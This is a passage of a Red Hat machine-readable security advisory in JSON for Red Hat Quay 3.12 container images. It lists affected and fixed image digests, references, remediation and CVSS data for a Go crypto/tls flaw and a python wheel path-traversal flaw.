"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-24049",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-01-22T05:00:54.709179+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431959"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "RHBZ#2431959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24049"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef",
"url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/releases/tag/0.46.2",
"url": "https://github.com/pypa/wheel/releases/tag/0.46.2"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx",
"url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx"
}
],
"release_date": "2026-01-22T04:02:08.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
